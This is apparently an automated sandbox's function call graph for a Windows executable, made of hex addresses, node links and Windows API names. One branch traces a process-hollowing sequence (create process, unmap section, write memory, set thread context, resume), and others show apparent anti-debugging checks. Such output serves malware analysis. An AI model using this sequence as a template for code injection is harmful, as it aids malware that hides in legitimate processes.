60461c 4514->4516 4517 604788 RegQueryValueExA 4515->4517 4526 604684 4515->4526 4530 6045b4 4515->4530 4516->4515 4522 604633 lstrcpyn 4516->4522 4517->4504 4517->4505 4518 60469e lstrcpyn 4525 6046bd 4518->4525 4520 604774 lstrcpyn 4520->4517 4522->4517 4523 6045b4 CharNextA 4523->4525 4524 6045b4 CharNextA 4524->4526 4525->4517 4525->4520 4525->4523 4527 6046df lstrcpyn FindFirstFileA 4525->4527 4526->4517 4526->4518 4527->4517 4528 60470d FindClose lstrlen 4527->4528 4528->4517 4529 60472c lstrcpyn lstrlen 4528->4529 4529->4525 4531 6045cb 4530->4531 4532 6045d8 4531->4532 4533 6045c1 CharNextA 4531->4533 4532->4517 4532->4524 4533->4531 4535 604580 4534->4535 4536 60459c LoadStringA 4534->4536 4535->4536 4537 604524 30 API calls 4535->4537 4538 603adc 4536->4538 4537->4536 4543 603ab0 4538->4543 4540 603aec 4548 6039ec 4540->4548 4544 603ab4 4543->4544 4545 603ad8 4543->4545 4546 602880 25 API calls 4544->4546 4545->4540 4547 603ac1 4546->4547 4547->4540 4549 6039f2 4548->4549 4550 603a0d 4548->4550 4549->4550 4552 6028b0 4549->4552 4550->4343 4553 6028b5 4552->4553 4554 6028c8 4552->4554 4553->4554 4555 602978 11 API calls 4553->4555 4554->4550 4555->4554 4556->4271 4557->4272 4745 608cb8 4558->4745 4560 608e01 4561 608e09 LoadLibraryA 4560->4561 4562 608cb8 25 API calls 4561->4562 4563 608e23 4562->4563 4753 608d40 4563->4753 4566 608e4a 4567 603a10 11 API calls 4566->4567 4568 608839 4567->4568 4569 608a40 GetPEB 4568->4569 4569->4569 4570 608a4e 4569->4570 4570->4277 4572 60962d 4571->4572 4573 608cb8 25 API calls 4572->4573 4574 60966b 4573->4574 4575 609673 LoadLibraryA 4574->4575 4576 608cb8 25 API calls 4575->4576 4577 60968d 4576->4577 4578 608d40 lstrcmp 4577->4578 4579 60969e 4578->4579 4580 608cb8 25 API calls 4579->4580 4581 6096b2 4580->4581 4582 608d40 lstrcmp 4581->4582 4583 6096c3 4582->4583 4584 608cb8 25 API calls 4583->4584 4585 6096d7 4584->4585 4586 608d40 lstrcmp 4585->4586 4587 6096e8 4586->4587 4588 608cb8 25 API calls 4587->4588 4589 6096fd 4588->4589 4590 608d40 lstrcmp 4589->4590 4591 60970e 4590->4591 4592 608cb8 25 API calls 4591->4592 4593 609723 4592->4593 4594 608d40 lstrcmp 4593->4594 4595 609734 4594->4595 4596 603adc 25 API calls 4595->4596 4597 609768 4596->4597 4598 603a40 25 API calls 4597->4598 4599 609773 4598->4599 4600 603a10 11 API calls 4599->4600 4601 609791 4600->4601 4602 6039ec 11 API calls 4601->4602 4603 609799 4602->4603 4604 6039ec 11 API calls 4603->4604 4605 608862 4604->4605 4605->4282 4607 603a44 4606->4607 4609 603a54 4606->4609 4607->4609 4610 603ab0 25 API calls 4607->4610 4608 603a82 4612 605e3c 4608->4612 4609->4608 4611 6028b0 11 API calls 4609->4611 4610->4609 4611->4608 4613 605e4c 4612->4613 4614 605e6d 4613->4614 4763 605ce0 4613->4763 4614->4293 4617 608aa8 4616->4617 4618 6039ec 11 API calls 4617->4618 4627 608ac6 4618->4627 4619 608b18 4620 603a10 11 API calls 4619->4620 4621 608b81 4620->4621 4621->4309 4622 608b4f 4623 608b5c 4622->4623 4624 6039ec 11 API calls 4622->4624 4625 603a40 25 API calls 4623->4625 4624->4623 4625->4619 4626 603e44 25 API calls 4626->4627 4627->4619 4627->4622 4627->4626 4628 603c68 25 API calls 4627->4628 4629 608b0d 4627->4629 4630 6039ec 11 API calls 4627->4630 4628->4627 4631 603a40 25 API calls 4629->4631 4630->4627 4631->4619 4633 608bae 4632->4633 4634 6039ec 11 API calls 4633->4634 4637 608bc3 4634->4637 4636 608bf4 4638 603a10 11 API calls 4636->4638 4637->4636 4639 603c68 25 API calls 4637->4639 4829 603e44 4637->4829 4640 608c0e 4638->4640 4639->4637 4640->4309 4642 608c3a 4641->4642 4643 608c89 4642->4643 4647 603c68 25 API calls 4642->4647 4836 603bb8 4642->4836 4645 6039ec 11 API calls 4643->4645 4646 608c9e 4645->4646 4648 6039ec 11 API calls 4646->4648 4647->4642 4649 608ca6 4648->4649 4649->4309 4651 608ec6 4650->4651 4839 6044a8 4651->4839 4653 608eef 4654 603e3c 25 API calls 4653->4654 4655 608f03 4654->4655 4656 6039ec 11 API calls 4655->4656 4657 608f22 4656->4657 4657->4309 4659 60901c 4658->4659 4660 608cb8 25 API calls 4659->4660 4661 609055 4660->4661 4662 609060 LoadLibraryA 4661->4662 4663 608cb8 25 API calls 4662->4663 4664 60907d 4663->4664 4665 609088 LoadLibraryA 4664->4665 4666 608cb8 25 API calls 4665->4666 4667 6090a5 4666->4667 4668 608d40 lstrcmp 4667->4668 4669 6090b9 4668->4669 4670 608cb8 25 API calls 4669->4670 4671 6090d1 4670->4671 4672 608d40 lstrcmp 4671->4672 4673 6090e5 4672->4673 4674 608cb8 25 API calls 4673->4674 4675 6090fd 4674->4675 4676 608d40 lstrcmp 4675->4676 4677 609111 4676->4677 4678 608cb8 25 API calls 4677->4678 4679 609129 4678->4679 4680 608d40 lstrcmp 4679->4680 4681 60913d 4680->4681 4682 608cb8 25 API calls 4681->4682 4683 609155 4682->4683 4684 608d40 lstrcmp 4683->4684 4685 609169 4684->4685 4686 608cb8 25 API calls 4685->4686 4687 609180 4686->4687 4688 608d40 lstrcmp 4687->4688 4689 609194 4688->4689 4690 608cb8 25 API calls 4689->4690 4691 6091ac 4690->4691 4692 608d40 lstrcmp 4691->4692 4693 6091c0 4692->4693 4694 608cb8 25 API calls 4693->4694 4695 6091d8 4694->4695 4696 608d40 lstrcmp 4695->4696 4697 6091ec 4696->4697 4698 608cb8 25 API calls 4697->4698 4699 609204 4698->4699 4700 608d40 lstrcmp 4699->4700 4701 609218 4700->4701 4702 609483 4701->4702 4906 608fac 4701->4906 4703 603a10 11 API calls 4702->4703 4704 6094cc 4703->4704 4705 6044b4 13 API calls 4704->4705 4706 6094da 4705->4706 4706->4309 4708 6092c6 4709 6092d1 CreateProcessA 4708->4709 4709->4702 4710 6092df 4709->4710 4710->4702 4711 609302 ReadProcessMemory 4710->4711 4913 604f9c 4711->4913 4713 609354 NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 4714 6093b7 4713->4714 4715 609438 WriteProcessMemory Wow64SetThreadContext ResumeThread 4713->4715 4716 6093e9 WriteProcessMemory VirtualProtectEx 4714->4716 4715->4702 4716->4714 4716->4715 4718 605d60 4717->4718 4719 603adc 25 API calls 4718->4719 4720 605d68 4719->4720 4720->4293 4722 603cab 4721->4722 4723 603c6c 4721->4723 4722->4293 4724 603c76 4723->4724 4727 603a40 4723->4727 4725 603ca0 4724->4725 4726 603c89 4724->4726 4728 603e84 25 API calls 4725->4728 4730 603e84 25 API calls 4726->4730 4731 603ab0 25 API calls 4727->4731 4732 603a54 4727->4732 4734 603c8e 4728->4734 4729 603a82 4729->4293 4730->4734 4731->4732 4732->4729 4733 6028b0 11 API calls 4732->4733 4733->4729 4734->4293 4736 6044ec 4735->4736 4738 6044ba 4735->4738 4741 603a10 4736->4741 4737 6044e4 4739 6028b0 11 API calls 4737->4739 4738->4736 4738->4737 4928 603f9c 4738->4928 4739->4736 4743 603a16 4741->4743 4742 603a3c 4742->4311 4743->4742 4744 6028b0 11 API calls 4743->4744 4744->4743 4747 608cd2 4745->4747 4746 608d10 4748 603a40 25 API calls 4746->4748 4747->4746 4757 603e3c 4747->4757 4750 608d1b 4748->4750 4751 6039ec 11 API calls 4750->4751 4752 608d30 4751->4752 4752->4560 4754 608d73 4753->4754 4755 608d9e OutputDebugStringA 4753->4755 4754->4755 4756 608d76 lstrcmp 4754->4756 4755->4566 4756->4754 4756->4755 4758 603df8 4757->4758 4759 603e33 4758->4759 4760 603ab0 25 API calls 4758->4760 4759->4747 4761 603e0f 4760->4761 4761->4759 4762 6028b0 11 API calls 4761->4762 4762->4759 4766 6073a0 4763->4766 4765 605cf9 4765->4614 4767 6073ae 4766->4767 4768 604b70 56 API calls 4767->4768 4769 6073d8 4768->4769 4776 6064bc 4769->4776 4772 603a40 25 API calls 4773 6073f1 4772->4773 4774 603a10 11 API calls 4773->4774 4775 60740b 4774->4775 4775->4765 4779 6064d0 4776->4779 4781 6064f5 4779->4781 4780 606520 4783 60657d 4780->4783 4790 606537 4780->4790 4781->4780 4792 6060f8 4781->4792 4784 603adc 25 API calls 4783->4784 4785 6064cb 4784->4785 4785->4772 4786 606572 4788 603e84 25 API calls 4786->4788 4787 6039ec 11 API calls 4787->4790 4788->4785 4790->4786 4790->4787 4791 6060f8 56 API calls 4790->4791 4800 603e84 4790->4800 4791->4790 4798 606121 4792->4798 4793 606132 4817 60644f 4793->4817 4796 6061da 11 API calls 4796->4798 4798->4793 4798->4796 4806 606222 4798->4806 4814 6060ec 4798->4814 4801 603e91 4800->4801 4802 603ec1 4800->4802 4804 603ab0 25 API calls 4801->4804 4805 603e9d 4801->4805 4803 6039ec 11 API calls 4802->4803 4803->4805 4804->4802 4805->4790 4807 606233 4806->4807 4811 60628d 4806->4811 4809 60632b 4807->4809 4807->4811 4808 60644f 11 API calls 4808->4811 4813 605d04 4809->4813 4824 6060c8 4809->4824 4811->4808 4811->4813 4820 606070 4811->4820 4813->4798 4815 6039ec 11 API calls 4814->4815 4816 6060f6 4815->4816 4816->4798 4818 6039ec 11 API calls 4817->4818 4819 60645c 4818->4819 4819->4780 4821 606081 4820->4821 4822 605ce0 56 API calls 4821->4822 4823 6060c1 4822->4823 4823->4811 4825 6060e0 4824->4825 4826 6060d4 4824->4826 4827 602978 11 API calls 4825->4827 4826->4813 4828 6060e7 4827->4828 4828->4813 4830 603e76 4829->4830 4832 603e49 4829->4832 4831 6039ec 11 API calls 4830->4831 4835 603e6c 4831->4835 4832->4830 4833 603e5d 4832->4833 4834 603adc 25 API calls 4833->4834 4834->4835 4835->4637 4837 603adc 25 API calls 4836->4837 4838 603bc5 4837->4838 4838->4642 4842 6042fc 4839->4842 4843 60431f 4842->4843 4848 60433a 4842->4848 4844 60432a 4843->4844 4845 602978 11 API calls 4843->4845 4856 6042f4 4844->4856 4845->4844 4847 604335 4847->4653 4849 60438a 4848->4849 4850 602978 11 API calls 4848->4850 4851 602880 25 API calls 4849->4851 4852 60439c 4849->4852 4850->4849 4853 6043e5 4851->4853 4852->4847 4855 6042fc 29 API calls 4852->4855 4853->4852 4859 6042dc 4853->4859 4855->4852 4857 6044b4 13 API calls 4856->4857 4858 6042f9 4857->4858 4858->4847 4862 6041bc 4859->4862 4861 6042e7 4861->4852 4863 6041d1 4862->4863 4864 6041f7 4862->4864 4865 6041d6 4863->4865 4866 604219 4863->4866 4867 603a40 25 API calls 4864->4867 4876 604214 4864->4876 4869 6041db 4865->4869 4870 60422d 4865->4870 4866->4876 4881 603f2c 4866->4881 4867->4864 4872 6041e0 4869->4872 4873 604241 4869->4873 4870->4876 4888 604088 4870->4888 4874 604262 4872->4874 4875 6041e5 4872->4875 4873->4876 4877 6041bc 29 API calls 4873->4877 4874->4876 4893 6040a0 4874->4893 4875->4864 4875->4876 4879 604293 4875->4879 4876->4861 4877->4873 4879->4876 4902 6044f0 4879->4902 4882 603ee8 4881->4882 4883 603f34 4881->4883 4884 603f04 4882->4884 4885 603ef6 SysFreeString 4882->4885 4883->4882 4886 603f3f SysReAllocStringLen 4883->4886 4884->4866 4885->4884 4886->4882 4887 603f4f 4886->4887 4887->4866 4889 604091 4888->4889 4890 604098 4888->4890 4889->4870 4891 602978 11 API calls 4890->4891 4892 60409f 4891->4892 4892->4870 4900 6040ba 4893->4900 4894 603a40 25 API calls 4894->4900 4895 603f2c 2 API calls 4895->4900 4896 604088 11 API calls 4896->4900 4897 6041a6 4897->4874 4898 6041bc 29 API calls 4898->4900 4899 6040a0 29 API calls 4899->4900 4900->4894 4900->4895 4900->4896 4900->4897 4900->4898 4900->4899 4901 6044f0 13 API calls 4900->4901 4901->4900 4903 6044f7 4902->4903 4904 6044b4 13 API calls 4903->4904 4905 604511 4903->4905 4904->4905 4905->4879 4907 608fbe 4906->4907 4908 608fc0 4907->4908 4911 608fc7 4907->4911 4917 608f38 4908->4917 4910 608fe4 4910->4708 4911->4910 4912 603a40 25 API calls 4911->4912 4912->4910 4927 602a24 4913->4927 4915 604faf CreateWindowExA 4916 604fe7 4915->4916 4916->4713 4918 603e84 25 API calls 4917->4918 4919 608f5e 4918->4919 4920 608f67 GetModuleFileNameA 4919->4920 4921 603e84 25 API calls 4920->4921 4922 608f7d 4921->4922 4923 603a40 25 API calls 4922->4923 4924 608f87 4923->4924 4925 6039ec 11 API calls 4924->4925 4926 608f9c 4925->4926 4926->4911 4927->4915 4929 603fa5 4928->4929 4948 603fda 4928->4948 4930 603fba 4929->4930 4931 603fdf 4929->4931 4932 603ffc 4930->4932 4933 603fbe 4930->4933 4934 603ff0 4931->4934 4935 603fe6 4931->4935 4937 604003 4932->4937 4938 60400a 4932->4938 4939 603fc2 4933->4939 4947 604013 4933->4947 4936 603a10 11 API calls 4934->4936 4940 6039ec 11 API calls 4935->4940 4936->4948 4953 603ef0 4937->4953 4956 603f08 4938->4956 4943 604022 4939->4943 4944 603fc6 4939->4944 4940->4948 4943->4948 4949 603f9c 13 API calls 4943->4949 4946 604040 4944->4946 4952 603fca 4944->4952 4946->4948 4965 603f50 4946->4965 4947->4948 4960 603f84 4947->4960 4948->4737 4949->4943 4951 6044b4 13 API calls 4951->4952 4952->4948 4952->4951 4954 603f04 4953->4954 4955 603ef6 SysFreeString 4953->4955 4954->4948 4955->4954 4957 603f0e 4956->4957 4958 603f14 SysFreeString 4957->4958 4959 603f26 4957->4959 4958->4957 4959->4948 4961 603f94 4960->4961 4962 603f8d 4960->4962 4963 602978 11 API calls 4961->4963 4962->4947 4964 603f9b 4963->4964 4964->4947 4966 603f62 4965->4966 4967 603f9c 13 API calls 4966->4967 4968 603f7b 4966->4968 4967->4966 4968->4946 4970 603872 GetStdHandle WriteFile GetStdHandle WriteFile 4969->4970 4971 6038c9 4969->4971 4970->4315 4973 6038d2 MessageBoxA 4971->4973 4974 6038e5 4971->4974 4973->4974 4974->4315 5661 6075f0 5662 607534 56 API calls 5661->5662 5663 6075f8 5662->5663 5174 607cf2 5175 607cf4 5174->5175 5179 607c80 GetLocaleInfoA 5175->5179 5185 603c34 5179->5185 5186 603c3f 5185->5186 5343 602f7a 5344 602f6b RegCloseKey 5343->5344 5345 608742 5346 608744 5345->5346 5347 60879e 5346->5347 5359 603790 5346->5359 5349 608768 5350 60878a 5349->5350 5351 603a40 25 API calls 5349->5351 5363 60796c 5350->5363 5351->5350 5355 608794 5370 608288 GetModuleHandleA 5355->5370 5357 608799 5373 607ee4 5357->5373 5360 60379c 5359->5360 5361 604b70 56 API calls 5360->5361 5362 6037b1 5360->5362 5361->5360 5362->5349 5364 607364 56 API calls 5363->5364 5365 60797e 5364->5365 5366 607364 56 API calls 5365->5366 5367 607995 5366->5367 5368 607a70 GetVersionExA 5367->5368 5369 607a87 5368->5369 5369->5355 5371 608299 GetProcAddress 5370->5371 5372 6082a9 5370->5372 5371->5372 5372->5357 5374 607eec 5373->5374 5374->5374 5447 607d6c GetThreadLocale 5374->5447 5379 607f1a GetThreadLocale 5381 606adc 26 API calls 5379->5381 5382 607f33 5381->5382 5383 603a40 25 API calls 5382->5383 5384 607f40 5383->5384 5385 606adc 26 API calls 5384->5385 5386 607f55 5385->5386 5387 606adc 26 API calls 5386->5387 5388 607f79 5387->5388 5476 606b28 GetLocaleInfoA 5388->5476 5391 606b28 GetLocaleInfoA 5392 607fa9 5391->5392 5393 606adc 26 API calls 5392->5393 5394 607fc3 5393->5394 5395 606b28 GetLocaleInfoA 5394->5395 5396 607fe0 5395->5396 5397 606adc 26 API calls 5396->5397 5398 607ffa 5397->5398 5478 606e14 5398->5478 5401 603a40 25 API calls 5402 608012 5401->5402 5403 606adc 26 API calls 5402->5403 5404 608027 5403->5404 5405 606e14 28 API calls 5404->5405 5406 608032 5405->5406 5407 603a40 25 API calls 5406->5407 5408 60803f 5407->5408 5409 606b28 GetLocaleInfoA 5408->5409 5410 60804d 5409->5410 5411 606adc 26 API calls 5410->5411 5412 608067 5411->5412 5413 603a40 25 API calls 5412->5413 5414 608074 5413->5414 5415 606adc 26 API calls 5414->5415 5416 608089 5415->5416 5417 603a40 25 API calls 5416->5417 5418 608096 5417->5418 5419 6039ec 11 API calls 5418->5419 5420 60809e 5419->5420 5421 6039ec 11 API calls 5420->5421 5422 6080a6 5421->5422 5423 606adc 26 API calls 5422->5423 5424 6080bb 5423->5424 5425 6080d8 5424->5425 5426 6080c9 5424->5426 5428 603a84 11 API calls 5425->5428 5497 603a84 5426->5497 5429 6080d6 5428->5429 5430 606adc 26 API calls 5429->5430 5432 6080fa 5430->5432 5431 608138 5501 603cac 5431->5501 5432->5431 5434 606adc 26 API calls 5432->5434 5436 60811d 5434->5436 5440 60813a 5436->5440 5441 60812b 5436->5441 5443 603a84 11 API calls 5440->5443 5442 603a84 11 API calls 5441->5442 5442->5431 5443->5431 5448 607d9f 5447->5448 5449 607e8f GetSystemMetrics GetSystemMetrics 5448->5449 5452 607de2 5448->5452 5450 607eb6 5449->5450 5456 607deb 5449->5456 5451 607cf4 14 API calls 5450->5451 5451->5456 5452->5456 5510 607cf4 5452->5510 5454 607e04 5455 607e45 GetStringTypeA 5454->5455 5454->5456 5455->5456 5457 606b8c GetThreadLocale 5456->5457 5459 606bbf 5457->5459 5458 606b50 57 API calls 5458->5459 5459->5458 5460 603a40 25 API calls 5459->5460 5463 606c11 5459->5463 5460->5459 5461 606b50 57 API calls 5461->5463 5462 603a40 25 API calls 5462->5463 5463->5461 5463->5462 5464 606c84 5463->5464 5465 603a10 11 API calls 5464->5465 5466 606c9e 5465->5466 5466->5379 5467 606d64 GetThreadLocale 5466->5467 5468 606adc 26 API calls 5467->5468 5469 606d90 5468->5469 5470 606de5 5469->5470 5471 606da9 GetThreadLocale EnumCalendarInfoA 5469->5471 5474 6039ec 11 API calls 5470->5474 5472 606dc6 5471->5472 5472->5472 5473 606dd2 GetThreadLocale EnumCalendarInfoA 5472->5473 5473->5470 5475 606dfa 5474->5475 5475->5379 5477 606b44 5476->5477 5477->5391 5479 606e3f GetThreadLocale 5478->5479 5480 6039ec 11 API calls 5478->5480 5481 606adc 26 API calls 5479->5481 5480->5479 5482 606e57 5481->5482 5483 606e70 5482->5483 5495 606ecf 5482->5495 5484 606ec1 5483->5484 5491 606e8c 5483->5491 5486 603a40 25 API calls 5484->5486 5485 606ebc 5488 603a10 11 API calls 5485->5488 5486->5485 5487 607bb4 CharNextA 5487->5495 5489 606fdd 5488->5489 5489->5401 5490 603e44 25 API calls 5490->5495 5491->5485 5492 603bb8 25 API calls 5491->5492 5493 603c68 25 API calls 5491->5493 5492->5491 5493->5491 5494 603c68 25 API calls 5494->5495 5495->5485 5495->5487 5495->5490 5495->5494 5496 603bb8 25 API calls 5495->5496 5496->5495 5499 603a88 5497->5499 5498 603aac 5498->5429 5499->5498 5500 6028b0 11 API calls 5499->5500 5500->5498 5502 603cbd 5501->5502 5503 603ce3 5502->5503 5504 603cfa 5502->5504 5505 603e84 25 API calls 5503->5505 5506 603ab0 25 API calls 5504->5506 5508 603cf0 5505->5508 5506->5508 5507 603d2b 5508->5507 5509 603a40 25 API calls 5508->5509 5509->5507 5511 607c80 13 API calls 5510->5511 5512 607d0c GetCPInfo 5511->5512 5513 607d16 5512->5513 5513->5454 4975 6048c3 lstrcpyn GetThreadLocale GetLocaleInfoA 4976 6049f3 4975->4976 4977 6048fa 4975->4977 4977->4976 4978 60490a lstrlen 4977->4978 4979 604923 4978->4979 4979->4976 4980 604951 lstrcpyn LoadLibraryExA 4979->4980 4981 60497d 4979->4981 4980->4981 4981->4976 4982 604987 lstrcpyn LoadLibraryExA 4981->4982 4982->4976 4983 6049bd lstrcpyn LoadLibraryExA 4982->4983 4983->4976 5518 608744 5519 60879e 5518->5519 5520 60875e 5518->5520 5521 603790 56 API calls 5520->5521 5523 608768 5521->5523 5522 60878a 5525 60796c 56 API calls 5522->5525 5523->5522 5524 603a40 25 API calls 5523->5524 5524->5522 5526 60878f 5525->5526 5527 607a70 GetVersionExA 5526->5527 5528 608794 5527->5528 5529 608288 2 API calls 5528->5529 5530 608799 5529->5530 5531 607ee4 74 API calls 5530->5531 5531->5519 5664 6085c4 5665 6085e1 5664->5665 5666 60872b 5664->5666 5710 60825c 5665->5710 5668 6085f0 5669 603f9c 13 API calls 5668->5669 5670 60860a 5669->5670 5671 603f9c 13 API calls 5670->5671 5672 60861f 5671->5672 5673 603f9c 13 API calls 5672->5673 5674 608634 5673->5674 5675 6039ec 11 API calls 5674->5675 5676 60863e 5675->5676 5677 6044b4 13 API calls 5676->5677 5678 60864e 5677->5678 5679 6044b4 13 API calls 5678->5679 5680 60865e 5679->5680 5681 603f9c 13 API calls 5680->5681 5682 608673 5681->5682 5683 603f9c 13 API calls 5682->5683 5684 608688 5683->5684 5685 603f9c 13 API calls 5684->5685 5686 60869d 5685->5686 5687 603f9c 13 API calls 5686->5687 5688 6086b2 5687->5688 5689 603f9c 13 API calls 5688->5689 5690 6086c7 5689->5690 5691 6039ec 11 API calls 5690->5691 5692 6086d1 5691->5692 5693 6039ec 11 API calls 5692->5693 5694 6086db 5693->5694 5695 6039ec 11 API calls 5694->5695 5696 6086e5 5695->5696 5697 6039ec 11 API calls 5696->5697 5698 6086ef 5697->5698 5699 6039ec 11 API calls 5698->5699 5700 6086f9 5699->5700 5701 6039ec 11 API calls 5700->5701 5702 608703 5701->5702 5703 6039ec 11 API calls 5702->5703 5704 60870d 5703->5704 5705 6039ec 11 API calls 5704->5705 5706 608717 5705->5706 5707 603ef0 SysFreeString 5706->5707 5708 608721 5707->5708 5709 6039ec 11 API calls 5708->5709 5709->5666 5711 608268 5710->5711 5712 608283 5711->5712 5713 6028b0 11 API calls 5711->5713 5712->5668 5713->5711 4998 607046 4999 607048 VirtualQuery 4998->4999 5000 607091 GetModuleFileNameA 4999->5000 5001 607075 GetModuleFileNameA 4999->5001 5002 6070af 5000->5002 5001->5000 5001->5002 5003 60456c 30 API calls 5002->5003 5004 607146 LoadStringA 5003->5004 5005 607159 5004->5005 5008 606470 5005->5008 5007 6071c8 5009 6064a0 5008->5009 5010 606481 5008->5010 5009->5007 5010->5009 5011 6060f8 56 API calls 5010->5011 5011->5009 5714 602fc7 5715 602f66 RegCloseKey 5714->5715 5716 602fcb 5714->5716 5718 6033c9 5719 604ddc 4 API calls 5718->5719 5720 6033ce 5719->5720 5189 6036ca 5190 6036cf 5189->5190 5195 60344c 5190->5195 5192 6036d4 5193 6036d9 5192->5193 5194 6034a0 4 API calls 5192->5194 5194->5193 5196 604ddc 4 API calls 5195->5196 5197 60345c 5196->5197 5197->5192 5721 6089cd 5722 6089ac 5721->5722 5723 6044b4 13 API calls 5722->5723 5724 6089ba 5723->5724 5725 603a10 11 API calls 5724->5725 5726 6089c7 5725->5726 5731 6075d5 5732 6075bf 5731->5732 5733 6039ec 11 API calls 5732->5733 5734 6075c7 5733->5734 5735 6039ec 11 API calls 5734->5735 5736 6075cf 5735->5736 5540 60795c 5545 6071e0 5540->5545 5543 6039d4 7 API calls 5544 60796b 5543->5544 5559 607048 VirtualQuery 5545->5559 5547 6071f4 5548 60725c 5547->5548 5549 6071fe 5547->5549 5550 60456c 30 API calls 5548->5550 5568 602a74 5549->5568 5552 607276 LoadStringA MessageBoxA 5550->5552 5554 607292 5552->5554 5554->5543 5558 60722c GetStdHandle WriteFile GetStdHandle WriteFile 5558->5554 5560 607091 GetModuleFileNameA 5559->5560 5561 607075 GetModuleFileNameA 5559->5561 5562 6070af 5560->5562 5561->5560 5561->5562 5563 60456c 30 API calls 5562->5563 5564 607146 LoadStringA 5563->5564 5565 607159 5564->5565 5566 606470 56 API calls 5565->5566 5567 6071c8 5566->5567 5567->5547 5575 602a2c 5568->5575 5571 602984 5572 604ddc 4 API calls 5571->5572 5573 60298c CharToOemA 5572->5573 5574 605fb0 5573->5574 5574->5558 5576 602a38 5575->5576 5577 602a6d 5576->5577 5578 6029a4 4 API calls 5576->5578 5577->5571 5578->5577 5737 601ba1 5738 601b7e 5737->5738 5739 601b91 RtlDeleteCriticalSection 5738->5739 5740 601b87 RtlLeaveCriticalSection 5738->5740 5740->5739 5579 605f28 5580 605f3e GetDiskFreeSpaceA 5579->5580 5582 605f83 5580->5582 5587 603b2c 5588 603b45 5587->5588 5589 603b4e 5587->5589 5590 6039ec 11 API calls 5588->5590 5591 603b81 5589->5591 5602 603b0c WideCharToMultiByte 5589->5602 5592 603b4c 5590->5592 5594 603e84 25 API calls 5591->5594 5596 603b8e 5594->5596 5595 603b6c 5595->5591 5597 603b72 5595->5597 5603 603b0c WideCharToMultiByte 5596->5603 5599 603adc 25 API calls 5597->5599 5599->5592 5600 603b9c 5601 603e84 25 API calls 5600->5601 5601->5592 5602->5595 5603->5600 5608 607532 5609 607534 5608->5609 5610 607569 5609->5610 5611 60755d 5609->5611 5612 607567 5610->5612 5613 604b70 56 API calls 5610->5613 5614 603a84 11 API calls 5611->5614 5615 604b70 56 API calls 5612->5615 5613->5612 5614->5612 5616 6075a1 5615->5616 5617 6072e4 56 API calls 5616->5617 5618 6075b0 5617->5618 5619 6039ec 11 API calls 5618->5619 5620 6075c7 5619->5620 5621 6039ec 11 API calls 5620->5621 5622 6075cf 5621->5622 5016 604c33 5017 604c25 5016->5017 5018 6039ec 11 API calls 5017->5018 5019 604c2d 5018->5019 5761 6027b4 5762 6027c9 5761->5762 5763 6027ce 5761->5763 5766 6019d0 4 API calls 5762->5766 5764 6027f3 RtlEnterCriticalSection 5763->5764 5765 6027fd 5763->5765 5768 6027d2 5763->5768 5764->5765 5776 6025b0 5765->5776 5766->5763 5769 60280a 5772 602862 RtlLeaveCriticalSection 5769->5772 5773 60286c 5769->5773 5771 60222c 14 API calls 5774 602816 5771->5774 5772->5773 5774->5769 5786 6023d8 5774->5786 5777 6025c4 5776->5777 5778 6025f6 5777->5778 5779 602686 5777->5779 5780 6025e7 5777->5780 5778->5780 5783 601cbc 9 API calls 5778->5783 5779->5780 5781 601f74 9 API calls 5779->5781 5782 602721 5779->5782 5800 602078 5779->5800 5780->5769 5780->5771 5781->5779 5782->5780 5785 601e7c 9 API calls 5782->5785 5783->5780 5785->5780 5787 6023f6 5786->5787 5788 6023f1 5786->5788 5789 602431 5787->5789 5790 602427 RtlEnterCriticalSection 5787->5790 5797 6023fa 5787->5797 5791 6019d0 4 API calls 5788->5791 5792 6024dd 5789->5792 5796 602447 5789->5796 5798 602509 5789->5798 5790->5789 5791->5787 5795 601f74 7 API calls 5792->5795 5792->5797 5793 602594 RtlLeaveCriticalSection 5794 60259e 5793->5794 5794->5769 5795->5797 5796->5793 5796->5794 5797->5769 5798->5796 5799 601e7c 7 API calls 5798->5799 5799->5796 5805 6017f8 5800->5805 5802 60208d 5803 601fc0 9 API calls 5802->5803 5804 60209a 5802->5804 5803->5804 5804->5779 5806 60181b 5805->5806 5807 601494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5806->5807 5808 6018e1 5806->5808 5809 6012e4 LocalAlloc 5806->5809 5811 6018c7 5806->5811 5813 60187c 5806->5813 5807->5806 5810 6015d4 VirtualAlloc 5808->5810 5814 60188d 5808->5814 5809->5806 5810->5814 5812 60150c VirtualFree 5811->5812 5812->5814 5815 60150c VirtualFree 5813->5815 5814->5802 5815->5814 5020 607436 5021 60743a 5020->5021 5022 60743f 5020->5022 5024 603004 5021->5024 5029 603094 5024->5029 5027 6028b0 11 API calls 5028 603015 5027->5028 5028->5022 5030 60309a 5029->5030 5031 603f50 13 API calls 5030->5031 5032 60300e 5030->5032 5031->5030 5032->5027 5627 60373a 5628 60373f 5627->5628 5629 60344c 4 API calls 5628->5629 5630 603744 5629->5630 5631 603749 5630->5631 5632 6034a0 4 API calls 5630->5632 5632->5631 5816 6085ba 5818 6085c4 5816->5818 5817 60872b 5818->5817 5819 60825c 11 API calls 5818->5819 5820 6085f0 5819->5820 5821 603f9c 13 API calls 5820->5821 5822 60860a 5821->5822 5823 603f9c 13 API calls 5822->5823 5824 60861f 5823->5824 5825 603f9c 13 API calls 5824->5825 5826 608634 5825->5826 5827 6039ec 11 API calls 5826->5827 5828 60863e 5827->5828 5829 6044b4 13 API calls 5828->5829 5830 60864e 5829->5830 5831 6044b4 13 API calls 5830->5831 5832 60865e 5831->5832 5833 603f9c 13 API calls 5832->5833 5834 608673 5833->5834 5835 603f9c 13 API calls 5834->5835 5836 608688 5835->5836 5837 603f9c 13 API calls 5836->5837 5838 60869d 5837->5838 5839 603f9c 13 API calls 5838->5839 5840 6086b2 5839->5840 5841 603f9c 13 API calls 5840->5841 5842 6086c7 5841->5842 5843 6039ec 11 API calls 5842->5843 5844 6086d1 5843->5844 5845 6039ec 11 API calls 5844->5845 5846 6086db 5845->5846 5847 6039ec 11 API calls 5846->5847 5848 6086e5 5847->5848 5849 6039ec 11 API calls 5848->5849 5850 6086ef 5849->5850 5851 6039ec 11 API calls 5850->5851 5852 6086f9 5851->5852 5853 6039ec 11 API calls 5852->5853 5854 608703 5853->5854 5855 6039ec 11 API calls 5854->5855 5856 60870d 5855->5856 5857 6039ec 11 API calls 5856->5857 5858 608717 5857->5858 5859 603ef0 SysFreeString 5858->5859 5860 608721 5859->5860 5861 6039ec 11 API calls 5860->5861 5861->5817 5033 604c3c 5034 604c55 5033->5034 5035 604c78 5033->5035 5043 602a80 5034->5043 5038 602a80 4 API calls 5039 604c69 5038->5039 5040 602a80 4 API calls 